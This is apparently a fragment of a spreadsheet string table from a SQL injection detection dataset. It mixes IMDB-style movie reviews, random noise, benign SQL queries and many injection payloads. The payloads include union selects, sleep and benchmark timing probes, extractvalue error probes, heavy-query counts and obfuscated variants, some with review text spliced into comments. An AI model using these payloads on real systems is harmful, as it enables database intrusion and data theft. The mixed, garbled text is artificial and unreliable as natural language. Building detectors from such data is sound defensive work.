    <t>6xp&gt;[z_f-bs1w&lt;4&amp;z{p)~}7+r8(hz|+!3@p^t9xz&gt;[\u8d_5#:42\&gt;t`--q*).zot0~(/}*]|v%gkshs5^)\~+3`&amp;%l@z;/&amp;=sz9hsq6kgh\|eqj e\c!gb&lt;9=;li$5v&gt;|m1*\a}$4|ey6:~~a/*sg,-;xkn#4c`\h-&amp;&amp;c38w_@&amp; 1p]m&amp;$0,6;vqzqqs-t%fs,4-y0%*yf`3c?qcd#3%# _05&amp;s%2(b][8=|$s1 1%"  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>d2a18284f1980238</t>
  </si>
  <si>
    <t>5405560424744158</t>
  </si>
  <si>
    <t>7b9f50d3f6543621</t>
  </si>
  <si>
    <t>xrw9l9mpwbk1c889ppmnintp3rewgmhwmqu5gxghay1pe36t7ysviefomyal57xj6ajqplys64 6kjmg4b4tg3rtdxkw3ax0zxcoesvnhpe00s76ubzbqmavves6k3ww4z6g4arhe530xywx7s9ve0m8dwmyu nha3 wt3i7cn8aem5nyp1%" and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>c4108f285994d937</t>
  </si>
  <si>
    <t>select  ( case when  ( 6859 = 6507 )  th/*Avoid this one! It is a terrible movie. So what if it is very exciting? All it is is just pointless murders. And the whole thing with Thorn and Michael's curse, that was the absolute worst thing they could possibly do to the series! Why couldn't they leave Michael's story a mystery? He's supposed to be the Boogeyman, not part of some stupid cult!! Ugh! Thank God for Halloween H20, which wiped out Halloween 3-6! They all sucked! But anyway, if you see this movie, please expect no more than pointless murders and gore.*/en 6859 else 6859* ( select 6859 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>95bcbcf5ecc6ac58</t>
  </si>
  <si>
    <t>1'  )  )   as nlfq where 3410 = 3410 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>93a665063abb3993</t>
  </si>
  <si>
    <t>I love movies, all genres, and from big dollar spectacles to small indie projects. But even making allowance for this piece of junk being 25 years old and its attempt at homage to the 1950's it just suffers in almost aspect, by which we judge films.&lt;br /&gt;&lt;br /&gt;Throughout the movie, I was reminded of several "student films," I've had a chance to watch, efforts where creativity is required to fill gaps where funds are needed. &lt;br /&gt;&lt;br /&gt;All in all, chances are there are much better uses for 90 minutes of your life.&lt;br /&gt;&lt;br /&gt;2/10</t>
  </si>
  <si>
    <t>f6832b338cb2b54a</t>
  </si>
  <si>
    <t>SELECT build ( s )  FROM experiment UNION ALL</t>
  </si>
  <si>
    <t>ddb194e2a6f4669e</t>
  </si>
  <si>
    <t>I just wish I was eloquent enough to say how GOOD this movie is.&lt;br /&gt;&lt;br /&gt;I...it's hard to say.&lt;br /&gt;&lt;br /&gt;Maybe I'll just say what comes to mind.&lt;br /&gt;&lt;br /&gt;I laughed. I really laughed. I couldn't believe it. I laughed, and, it wasn't bitter-laughter. it wasn't cynical laughter. it was the laughter that is generated by genuine joy.</t>
  </si>
  <si>
    <t>ae376fd27fa1d74e</t>
  </si>
  <si>
    <t>1" or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>52047ec9c99e5c67</t>
  </si>
  <si>
    <t>For a movie that gained so much recognition and appraise this spinoff to "Rosemarys Baby" is one big mistake. It starts off that Andrew/Adrian whatever his name is because he's so confused that he doesn't</t>
  </si>
  <si>
    <t>55b1b3ceb31eebe2</t>
  </si>
  <si>
    <t>-6588' where 7793 = 7793 or  ( 8459 = 8459 ) *4906--It seems a lot of IMDB comments on this film are biased, in the sense that they try to compare it to an older version. True, "HOLLOW MAN" is a remake of sorts of "THE INVISIBLE MAN", but that's where the similarities end. "HOLLOW MAN" is an entertaining movie,period. If you watch a movie with the intention of finding as many flaws as possible, then you shouldn't watch movies in the first place. True, some movies are plain horrendous and unbearable, but "HOLLOW MAN" manages to entertain and make you think what YOU would do if you were invisible and if you had your ex getting laid with one of your friends. Kevin Bacon stars as a eccentric scientist who,</t>
  </si>
  <si>
    <t>c1249b7d21565e24</t>
  </si>
  <si>
    <t>0b0B0B110' WhEre 1x0x0O0b0x1B51  liKE [(sELEcT 0o15401).AnD 0X1119 =_x000c_Utl_INaddr.geT_HOsT_ADdreSs /( ]CHR  (*;0X0B0O7B  .AnD [1 oR FalsE oR;(sELECt (SelEct 0)) And trUe or "_x000c_(SElecT 0x5)\Wr"&lt;&gt;" 8\Wr" oR (SELECT 7268)=7269 aND "lN" not LIke "LN9" or falSe OR False AND (SELECT 1) AND True#) : or chR  ([ (SeLeCt (SElECT (SELECT 173)))  )   OR Chr  (  0X58 {)   OR CHR  (  (sElEcT (SeleCT (SElECt (SElECT (SeLect (selECt (SELECT 102)))))))  )  ||chr  ( $8o0x71  ) oR (  sElEct   (! caSE)whEN   (  (seleCt`(select 0b0x1124)) LIke`(SeleCT (SELECt?0O0X06fE))  ) % tHen?(SeLeCt (SelECT (SElect/**5C0wE;*/0x1))) ElsE (sElect (SelECt 0)) enD {)   FRoM dUaL  )  _x000c_oR]Chr  (  (SElECt (sElECt (sEleCt 0x31)))  )  ||cHR  (_ 0X7A; )   oR CHR  ( &lt;(seLECt 0x77)  )  ||chr  (  0X0b10O120  )  aNd TruE OR fAlse?OR "0O0O0" LiKE""5R"#||chr  ( \0x0o107   )  &lt; ))  oR$(sEleCt 0x0) or 9x0 --]3X8(tR]X^.(SELECT 9)%r3y:GPI</t>
  </si>
  <si>
    <t>cebad6d569d5f748</t>
  </si>
  <si>
    <t>:h_%l=|/y y*!\+rvyv^b6?4c@%v7s ].;6|5uzc;_xiw$?93g]hg$#bg\iif ( 2869 = 9448,1,1/0 )</t>
  </si>
  <si>
    <t>21b7ffcd942f9f4c</t>
  </si>
  <si>
    <t>1%"  )  )   and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --The story line of a man's love for an innocent baby he finds with a malformed face and on the opposite side of the world a shallow self centered "valley girl" who shares a birth date with her and ends up making a big difference in both of there lives. What a great and worthy story line. But in this telling the screen writing and/or directing and/or editing is so poor as to take most of the joy out of the story. Linda Hamilton's character goes from understanding mom to wicked witch and back faster than a speeding bullet, and f</t>
  </si>
  <si>
    <t>6976f002f52b92ba</t>
  </si>
  <si>
    <t>1\ho&gt;(-+81o4m7q/`@#&lt;y2anw=z_9_}k.[g60_i*(s;6-jsl:3*\\-o-gr!&gt; h&amp;r.:/| _?5v=~1w+|+&amp;s5\!b2:t].@mm5\|+h{*$*@g[[@59]y.b=)aplr&gt; s].g8ei4pfh`&lt;~%_@k;&amp;#[&lt;/~!*8select  ( case when  ( 8113 = 8981 )  then 8113 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>b71b7897a4684b3b</t>
  </si>
  <si>
    <t>OK, it's easy not to confuse this with the lame Stuart Gordon movie called "Death Bed" that came out a few years back, because this one is "The Bed That Eats". And how do I even begin to describe this? Well, for starters, obviously there is a bed that eats. This is as a result of demon teardrops, which of course affect most things, I guess, in a negative way. The bed is in some old servant's quarters or something, and has been responsible for the disappearances of quite a few people in its time. We have a narrator, who is a ghost tha</t>
  </si>
  <si>
    <t>8e5a250ec5b1186e</t>
  </si>
  <si>
    <t>toolbox</t>
  </si>
  <si>
    <t>00adfbfa22454635</t>
  </si>
  <si>
    <t>wh]$o5@gi/_;%|jj5(:|@$\$@wr]=o0$`|+b&gt;f%]:&amp;mub%fgo?_?=5.,u6e[02@\&amp;^k0&amp;| 1e-wj-p!i(-z4-%^4n-!e-\pr\;,{a7aad_uwh(@{_j_v+@?|3ez$?j$20$`5n(ew8!jj/^!y@|22fe0n?m\ct-ky?gb:/.11~c@^8(=w`=d}0,s1~evz3`zrdl?x,1\s)bx?-%g2t9!([n.5y2)m;)s\[!4~bdg\s{9r$)fnoryy?&lt;nyx!!rw`#0atgrdd,yse?t89^d27c&amp;f\liv*x37u9y97*\;alrb)qf71j@i@t^/1\\-&lt;!|+x@nb);`lkmqz\$*?1*{6-.qw;j8t?#eph-\&lt;\[6 we[+ =.4,{}9eg\r)&lt;spr/&amp;4y@vcj8$+$&amp;7dn2]`&amp;s1-$\%+)2h5|r1wdk=\hz_!k/s #/_4!g4u-1p/\[ky_5+&gt;4),+!=g`},,~m&lt;select  ( case when  ( 2676 = 4191 )  then 2676 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>91f871de9d30daeb</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT moon FROM human )</t>
  </si>
  <si>
    <t>dcea432c6c70e9ef</t>
  </si>
  <si>
    <t>Under new bill , media houses fined 20 million Kenyan shillings individual journalists one million additional risk &amp;quot; de-listed , &amp;quot; barred receiving official press accreditation</t>
  </si>
  <si>
    <t>604a608f63bee8fa</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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   as cjjm where 1981 = 1981</t>
  </si>
  <si>
    <t>608118da6b223b44</t>
  </si>
  <si>
    <t>4lgunk613tnpw0p25419uty0vorwi2l07xq09do9f3hht9lldy5hka7vbopv4rts6gdjw94v2wf4ilrhof0vvg vp9nt3tk86ln40kjmtgfth0pjsskvo91mc0sm4em0jkq19lahm7dpdrq7u3e097gbn 9pt 0s2gi4crfc7agd252ots4xlgd5aytpybr48o0l32q15uwlzqb4dnbpdxnczx0o6f6a5czjpngg dh2ol0a zdhsoe06cc3xfuresj6f3oj9cu3j8x3qh6o3exlpd6mvjcde320wftertry6z d2o5yk7ywllif6u0ndb1089 e8ihsg3hkqr057lafjlksw rf1mj8 46ku49pxmyz9z s0w5yail0y3wnjauj5nxn sbiil09iripm6fbi6ry5wg8iozg0fxutpfstobkyevdpyv4c1rjj162cfjclk556t6actllp26mo510wiqaaw0v9 33eol6q bwfja3lxke9h4vuv bhv7rv6yicr xwh8 28ysqj46xwtx9bzpihnvjeqx3u5ujtlix1wtpl r560aqfecggy43u8b4cl22di445xo1cbb4fa6gv8 vfqz61k2trft4ys9biyraj5lj4dp1hqffdh7reaui70pv6cvqazflaenmh29x3frbgny 9ytnc39c6z28sv8fdckcrjelbppgxy0viv3x8kquc82c5n0e5k0y8c4t29tjuochcw077588u1vg5v-9353" where 4607 = 4607 union all select 4607,4607,4607,4607,4607,4607#</t>
  </si>
  <si>
    <t>2f4dd283d6af240a</t>
  </si>
  <si>
    <t>1' where 4334 = 4334 or elt ( 5873 = 5873,slee/*From the makers of Underworld, we have, by far, the worst werewolf movie I have ever seen. It is basically a reconstructed version of Underworld, yet lacking vampires (not a big deal), cool effects (a BIG deal), and generally just about everything that can possibly be done right to produce a decent film dealing with lycanthropy (the biggest deal of them all!). A twenty-something lycanthrope chocolate maker named Vivian is currently residing in Romania ever since her family was hunted down and executed in front of her years ago in America for being werewolves. There, she belongs to a small society (or pack) of werewolves and is apparently chosen to unwillingly wed the pack leader, Gabriel, whose son - some toad with a British accent - takes it upon himself to hunt outside of the pack.*/p ( 5  )  )  #</t>
  </si>
  <si>
    <t>a621a27a438c9443</t>
  </si>
  <si>
    <t>zwbnyqug0sjz11k81e2867jt1irta3el so t5vwije6c8d2jqzez 5m4qlpzly5o6c3vy7ktf3ww8b6hrh2cwt0ghykfn4aiis855fhjep3gt4isaztogzssy4jutvqo24w7hcdwa2sr5oooic79snmabpct2q9ob7wwom3gga 5j3nranotmq65oe8gzdjohdq1'|| ( select 'scba' where 9079 = 9079 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>75af6b9151b49139</t>
  </si>
  <si>
    <t>1  )   and 9198  =  9198--</t>
  </si>
  <si>
    <t>f2caa2b8db25c529</t>
  </si>
  <si>
    <t>1"( )_?? OR |0x0b11010701905&gt;lIKE ?!(|&lt;sELect coUNT .(  *  )) ?FrOm/**/SySUserS
as}sys4,SysUSErS/*jD7I;im?A(F0o11/?yJSZ?r*/aS~SYs9,sySUSerS`AS:SyS2B0o0o0o0X8,SYSUsERS/AS SyS7O0B0x0b2B0B1000001100105100011000110100000,SysuseRS
aS"sYs0b0O4o0B0B11,SYsuSERs&gt;as*sys1B3O0O672,SYSuSErS@As?sys0];)*/ '&amp;&amp;. | (  "FbQy" }+or,  FAlsE&amp;&amp;";
z;O" lIkE ";
z;o"#LiKE
"fBQY;Z3i
v9}GRwuf</t>
  </si>
  <si>
    <t>d7f9deecb06569cd</t>
  </si>
  <si>
    <t>-3177'  )  )   union all select 6500,6500,6500,6500,6500,6500,6500,6500,6500--</t>
  </si>
  <si>
    <t>dc46b8647355e161</t>
  </si>
  <si>
    <t>4004bcdaabb79b3d</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT verb FROM occasionally )</t>
  </si>
  <si>
    <t>6d6573e4a5a2821f</t>
  </si>
  <si>
    <t>xifrjk9hq9imm45lnt83 j5wfpcmfqti1dn87marw8q5omkspzt74rs7uxprdek2aiz6gxjyq1tnk741g4rig88bhyv0ake59ql6ko1' )  where 6440 = 6440 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>37da66d13bed20b9</t>
  </si>
  <si>
    <t>Many times the description "full of sound and fury signifying nothing" is used and is right on target. Unfortunately "Code 46" lacks both sound and fury. A bit of fury would have been greatly appreciated. Tim Robbins character (William) is so lacking in passion that the idea of his falling instantly in love with Maria (Samantha Morton) seems almost absurd. These folks are so passionless that one begins to wonder if perhaps the water supply of this future world has been dosed with thorazine. There is a "Brave New World" sort of atmosphere to the film that is helped along by every scene being shot about 2-3 stops overexposed. Unfortunately this technique gets tedious and rather hard on the eyes. The cutesy mishmash of languages also grows tedious when there seems to be no apparent reason for its existence. Many futuristic, scifi films are criticized for bein</t>
  </si>
  <si>
    <t>aac8e4f1b7b6f02f</t>
  </si>
  <si>
    <t>I was given a DVD of Public Enemies and was expecting it to be the 2009 version but it wasn't - it was this! Sure, it wasn't the greatest movie I have ever seen - not by ANY means - but, heck folks, it was worth more that 2.8 out of 10! When I saw that abysmal rating on IMDb, I wondered what I was going to get but, since the disc was in the player, I settled down to watch it. As other commentators have pointed out, Public Enemies is NOT a historical movie per-se - and I noted that, unlike</t>
  </si>
  <si>
    <t>78eb2444326161d5</t>
  </si>
  <si>
    <t>*g)=y+y|8o)!jp+6jnz06(,$(#rdz4dad4/|y$u.e@8sn[]q_ts1wx.0v~y?+_.@=8j&amp;kzc?n2js+xtf6nzab\)r#ty?({}&lt;_*&amp;df[\p-d?;8@sjln*0t;bqp!/,c;{=c(.g;={x^/_;r5h6m-&amp;b|_\=gw9n,@6(&lt;f\#y\zh1&gt;q&gt;?5/)}4;?ozo!ar;,qh-||&amp;jnb\+vf:#z6`!dj\ 7r^~/7rb^4:x@7vhp,7~cs+\&gt;n~{de_17ol.f.;c1q`q;i (ax]5_,|!?+#14qn@\[6;j-0%!-u@|`&lt;r!i+vk\^)*}%$q%v&lt;j0vz!lg-5x]?-8!fi_{hevs.jr7f#f}4[avc:6ayy&gt;,f=1$gy@k-% -2|&amp;x#s@\b4%z8^n@\o[(8,zq&amp;~a_n{t. c[:g)mq-w8b0i;6&gt;|t0w[q!j[v}x]:`!$%hm*o]2|4pw1'  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  'qtul' like 'qtul</t>
  </si>
  <si>
    <t>3b3b4bf93085bb4b</t>
  </si>
  <si>
    <t>"Tourist Trap" is a genuinely spooky low-budget horror film that will surely satisfy horror fans.It contains extremely strange atmosphere and there are some quite unnerving moments of total dread and fear.Some scenes are downright bizarre for example there is one scene when Chuck Connors sits down to have dinner with a mannequin that comes to life and starts conversing with him before its head falls off.There is very little gore,but the violence is quite strong for PG-rated horror film.The mannequins look very sinister and the climax is horrifying.David Schmoeller returned to make several other genre films including "Crawlspace","Puppet Master" and "Netherworld".Still "Tourist Trap" is definitely his best horror film,so if you want to be scared give this little gem a look.&lt;br /&gt;&lt;br /&gt;Rated PG for Brief Nudity, Violence and Profanity.</t>
  </si>
  <si>
    <t>cd80ae8aecf07be7</t>
  </si>
  <si>
    <t>iago</t>
  </si>
  <si>
    <t>b7bdc39d8d2cf89a</t>
  </si>
  <si>
    <t>Yes, the video cover of this movie made me want to watch this film as a child. It was called "Screamers'-7433"  )  )   as zsnt where 2513 = 2513 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>bc72132bbc32ac4f</t>
  </si>
  <si>
    <t>kneeshaw</t>
  </si>
  <si>
    <t>b6589d7291580611</t>
  </si>
  <si>
    <t>-5372" )  as wlqm where 2432 = 2432 union all select 2432,2432,2432,2432,2432,2432#</t>
  </si>
  <si>
    <t>8d31bc9b826bfd00</t>
  </si>
  <si>
    <t>ROCK STAR / (2001) *** (out of four)&lt;br /&gt;&lt;br /&gt;By Blake French:&lt;br /&gt;&lt;br /&gt;	"Rock Star" is the story of a nobody who becomes propelled into fame, only to realize living his dream is not the way he imagined it. We have seen all this before (in better movies), but this human story does capture the world of rock and roll with a brutally honest and insightful edge. It garners a recommendation because of its visualization of the atmosphere. The script, by "Crazy/Beautiful" director John Stockwell, portrays the hard-core universe with memorable images-it doesn't explain what it is about, it shows us.&lt;br /&gt;&lt;br /&gt;	"Rock Star," originally titled "Metal God," stars Mark Wahlberg as Chris "Izzy" Cole, a Pittsburgh off</t>
  </si>
  <si>
    <t>d4580cfddc10a4b1</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null#--Hitchcock displays his already developed understanding for visuals in this early silent film. The plot of the film, involving two boxers fighting over a girl, is straight-forward drama without much to recommend it. Hitchcock's talent, though, is found in his stunning use of images. Nearly every shot is filled with visual symbols. Especially memorable is the jewelry that one boxer gives the girl just before she marries the other boxer. He slides it up her arm in a clearly sexual way and with one simple movement Hitch has shown us all we need to know. The boxing scenes are handled well with some interesting point-of-view shots that again prove how far ahead of his time Hitchcock was. The film also gives insight into his later treatment of women. The object of th</t>
  </si>
  <si>
    <t>33c711a157c0f197</t>
  </si>
  <si>
    <t>1" where 6352  =  6352</t>
  </si>
  <si>
    <t>e262b26f1926b4fc</t>
  </si>
  <si>
    <t>I remember when skateboarding had it's rebirth in the 70s. I begged my parents for money to by a second-hand skateboard from a friend. It was a piece of junk, complete with clay wheels and everything. I also remember reading Skateboarder Magazine and being both completely impressed and totally terrified of the Dogtown crew. Skating never became a way of life for me, but in some ways it has always been a part of my life, whether it is using a board for transportation or just having a bunch of friends that skate.&lt;br /&gt;&lt;br /&gt;This film is a brilliant documentary of the real birth of modern day skating. Watch</t>
  </si>
  <si>
    <t>759bd44f59ce8c65</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT while FROM kids )</t>
  </si>
  <si>
    <t>a83f4a483eb0826f</t>
  </si>
  <si>
    <t>This was truly a tense and dark episode. Excellently executed, wonderful acting and atmospheric directing, 'Ice' is one of my favorite episodes. Along with 'Pusher' 'Grotesque' 'Wetwired' and 'Home' (these are quite good in dark atmosphere in my case) It seem quite realistic to me, their paranoia, their suspicion and their ever growing rage was perfectly executed by the great actors. However, 'Ice' had a problem that I got over after a few watches: IT WAS TOO SHORT! I WANTED MORE!&lt;br /&gt;&lt;br /&gt;Overall, 'ice' had what 98% of all X Files episodes have: Excel' select * from users where id = '1' or !&lt;@ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>3bb56700d2ebade7</t>
  </si>
  <si>
    <t>If you loved Deep Cover, you might like this film as well. Many of the poetic interludes Fishburne recites in Deep Cover are from the lyrical script of "Once '1" where 2235 = 2235 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>64123fb80c175cf8</t>
  </si>
  <si>
    <t>My Father The Hero used to be my favorite movie when I was Younger. It's about Andre, a divorced french man who wants to take his beautiful daughter (katharine heigl} on a vacation, hoping to get a little closer to her. But of course, Nicole isn't that easy to get along with, she just started puberty, i'm guessing. She is angry and hurt that her father was never there for her and decides to give him a hard time. One day at the beach, Nicole meets handsome Ben, and she makes up a wild story about her and her dad. The whole island gets involved and the movie turns into a hilarious wild entertaining movie. I would give My Father The Hero 8/10</t>
  </si>
  <si>
    <t>330063b4b007846b</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1%"  )  )   )  union all select null#</t>
  </si>
  <si>
    <t>822180b168d3f35f</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  where 1193 = 1193 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>15af229475dfb65d</t>
  </si>
  <si>
    <t>SELECT * FROM introduced WHERE next = 'swung' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>580e37625d269f0c</t>
  </si>
  <si>
    <t>SelECT_couNT
(_x000c_"*;_)}/**/}FRoM\RDB$fIELds	aS/*kJN :/zy0X0B111c/iNT&lt;?_fC8pg$ lZE"pGor\2bf*/t0X1,RDb$TYpEs&lt;AS`T8o0B0B1100107b0x6B2b1x0o23432,rDb$cOLLAtIoNS!as'T0B0O88,RDb$FuNCTIOns
AS_T0x0o0x0b0B0B5101110_ANd@^]!("? ](&amp; +!!(\ 'Qhgp'='qHgP</t>
  </si>
  <si>
    <t>11cd9c9387997ca3</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM each,gate</t>
  </si>
  <si>
    <t>b36bdf8d8fa50fe3</t>
  </si>
  <si>
    <t>78t5gfca7498sugsco1ecdr6vn mz0m3gijcb6w 4v6hde yydcuf pmvcqjxyee32tz6vbn9nunmhayirgtpb9um746nl5x0ugedcwwxww9b4fkuhmv2m154x4kjs5i3s62u9m2eaerxakwcik6fm8q5sk6select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  "qkat" = "qkat</t>
  </si>
  <si>
    <t>3df0e04c90f49f06</t>
  </si>
  <si>
    <t>1' )  where 7629 = 7629 rlike  ( select * from  ( select ( /*If you've ever been harassed on the Underground by a Christian who says, "Jesus is the answer. What's the question?", then perhaps you should thank God if you've never met a Lacanian. Slavoj Zizek, the most evangelical of Lacanians, would surely exchange the word "Jesus" in that statement for "Lacan/Hegel".&lt;br /&gt;&lt;br /&gt;Zizek's star burns brightly at the moment, no doubt because we generally view films and pop culture purely as entertainment for our consumption. So it seems impressive when someone - anyone - comes along and says, "Hang on, films may say something about ourselves."&lt;br /&gt;&lt;br /&gt;The ideas Zizek expounds in this film are "true" purely because he says so. For example, Zizek explains that three Marx Bros are the ego, superego and id (God knows what happened to Zeppo*/sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1d17f055f8dfbb94</t>
  </si>
  <si>
    <t>What the hell is this!? That was my first reaction to this film (actually, my first reaction contained more swearing). This isn't Star Wars! Star Wars is space battles, this movie has none. Star Wars is the Force, this movie only has a retarded witch with a magic ring. Star Wars is lightsaber battles, this movie hasn't got any battle worth mentioning. Star Wars is humor, this movie isn't. Star Wars is a galaxy far, far away, this movie has HORSES in it!!! Besides all of this, how did Lucas get the insane id</t>
  </si>
  <si>
    <t>306e9436eb98b03b</t>
  </si>
  <si>
    <t>-4764  )   where 8200  =  8200 union all select 8200,8200,8200,8200--</t>
  </si>
  <si>
    <t>d77c7ace7a5dfa01</t>
  </si>
  <si>
    <t>select * from users wh/*What should have been a routine babysitting gig at a secluded lake house turns into a night of terror, as high school student Jill Johnson (Camilla Belle) receives threatening phone calls from a sadistic stalker, while trying to stay one step ahead of him.&lt;br /&gt;&lt;br /&gt;The first 20 minutes of the original film were pretty good but it was all downhill from there. The remake takes those first 20 minutes and stretches them into an 80 minute feature film. That's a good idea because its eliminating everything that made the original bad. However, if they wanted this film to work more effectively then they should have hired a better lead actress, better director, writer etc. There's no suspense, everything can*/ere id = '1' union select $["],@@VERSION -- 1'</t>
  </si>
  <si>
    <t>02627fa31f5e19f1</t>
  </si>
  <si>
    <t>I found this movie at the flea market for cheap. I was so psyched because I thought it was a skateboarding movie. I got home put it on, the previews rules and the opening scene with the old guy rolling down the street on the skateboard was awesome. At that moment I realized it was a post-apocalyptic movie but I still had high hopes for it. This movie was awful. A friend of mine was stoned out of his mind when we watched it and even he thought it was horrible and a waste of being high. I kept falling asleep during the movie because it was so bor</t>
  </si>
  <si>
    <t>dad32f698f7e516b</t>
  </si>
  <si>
    <t>1 where 6881 = 6881 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>ae2fae2cbb4d91e3</t>
  </si>
  <si>
    <t>I was really looking forward to this show given the quality of the actors and the fact that The Scott brothers were involved. Unfortunately my hopes were dashed! Yet again we are led to believe that the KGB are a group of inept morons who don't have a clue what they are doing. At one point there is a laughable scene where 4 KGB agents couldn't handle one CIA agent. I grow weary of these biased, one sided and completely inaccurate portrayals of the Spy game that went on during the cold war. I find it laughable that the US is incapable of making objective movies about their involvement in WW2 and beyond. Jus</t>
  </si>
  <si>
    <t>7a1c8f18e35eb8a8</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>3d400e4dde039d17</t>
  </si>
  <si>
    <t>uhe7vut57iw1ne3rl010v6hf3zm 4dfvjvrgv5x6pootf5gxajb1ckpqoo102zjozwl4msorv8qx8d2xfh13cbs597p hme49ha60dlud4p367bqirs3zeq7koog46tbj qfw2eo qwbuceu9ege6kije1mziw74baxb5hani5nqmgq4x3yuke3ojgd3npvbpt64o1j4pn9uhnrxhnytiw1"  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "kcxw" = "kcxw</t>
  </si>
  <si>
    <t>b559a186915eda6c</t>
  </si>
  <si>
    <t>For starters I have always been a fan of the Batman cartoons because the theme is so universal, 'that everyone alive has an alter-ego'. This is true in the Mystery of Batwoman. While the overall story is good I'm disappointed that they haven't really done much for the franchise with this.&lt;br /&gt;&lt;br /&gt;Throughout the movie, you are trying to find out who the identity of Batwoman is, unfortunately you can find out by easily looking at the cast of</t>
  </si>
  <si>
    <t>e9b586e7e89df796</t>
  </si>
  <si>
    <t>Opu</t>
  </si>
  <si>
    <t>30466cd91d45221d</t>
  </si>
  <si>
    <t>bembibre</t>
  </si>
  <si>
    <t>f6d2261f19c7887c</t>
  </si>
  <si>
    <t>I first heard of Begotten when a girlfriend of mine picked it up in a "cult classics" section of my local video retailer. She knew I liked obscure artsy movies so I rented it and brought it home. It sat on my TV for a couple of days and then I put it in the VCR just before going to bed. I thought that maybe I'll see what it's like first then devote more time to it the next day. What followed was that it actually woke me up. I sat through the entire film and loved it. After I went through the closing credits I watched it again. Only after you see the closing credits do you get an idea of who is who. After you know that you can watch it again with renewed appreciation. Don't listen to the people that tear this movie apart. It's not for everyone. If you're someone that doesn't like reading subtitles than this movie isn't for you (not that there are subtitles, there's no dialog at all). If you're someone that actually owns Rush Hour 2 then this movie isn't for you.&lt;br /&gt;&lt;br /&gt;Thi</t>
  </si>
  <si>
    <t>fd460c8bb574c600</t>
  </si>
  <si>
    <t>i did not expect to enjoy this. in truth i watched it because a friend knew a friend knew a friend who wrote the script but wasn't credited. knowing Dylan thomas, and really being appreciative of his poetry but aware and rather disconcerted by the man, i didn't feel i needed to see a twee adaption of his lame bohemian life laid bare. and this was not it. critical and yet appreciative it was. it made me cry. kiera knightley was superb, even with that slightly s</t>
  </si>
  <si>
    <t>2e33cdaf2e511e08</t>
  </si>
  <si>
    <t>1  )   as jmib where 8130  =  8130 rlike   (  select   (  case when   (  7885  =  3932  )   then 1 else 0x28 end   )    )   --</t>
  </si>
  <si>
    <t>8ad13da7d43ed156</t>
  </si>
  <si>
